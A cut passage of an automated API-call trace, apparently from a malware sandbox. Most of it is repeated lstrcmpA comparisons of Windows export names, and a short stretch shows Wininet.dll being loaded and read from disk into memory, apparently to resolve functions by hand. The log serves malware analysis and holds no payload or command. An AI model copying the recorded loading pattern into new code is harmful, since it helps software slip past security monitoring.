lpString2="AddConsoleAliasA") returned 1 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0124.022] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0124.023] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.023] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.023] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.023] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0124.023] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0124.023] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0124.023] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0124.023] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0124.024] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0124.024] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0124.024] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0124.024] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0124.025] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0124.026] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0124.027] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0124.027] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0124.028] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0124.029] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0124.029] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0124.029] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0125.927] GetProcessHeap () returned 0x430000 [0125.927] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45c5f0 | out: hHeap=0x430000) returned 1 [0126.174] GetProcessHeap () returned 0x430000 [0126.175] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449220 [0126.178] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0126.189] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0126.189] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0126.189] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0126.189] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0126.189] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0126.189] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0126.189] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0126.189] GetProcessHeap () returned 0x430000 [0126.189] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x286600) returned 0x4124040 [0126.195] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0126.196] ReadFile (in: hFile=0x140, lpBuffer=0x4124040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4124040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0126.672] CloseHandle (hObject=0x140) returned 1 [0126.672] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0126.672] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0126.672] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0126.672] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0126.672] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0126.672] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0126.672] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0126.672] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0126.673] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0126.673] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0126.673] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0126.673] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0126.673] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0126.674] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0126.674] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0126.675] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0126.675] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0126.676] lstrcmpA (lpString1="AppCacheGetIEGroupList", 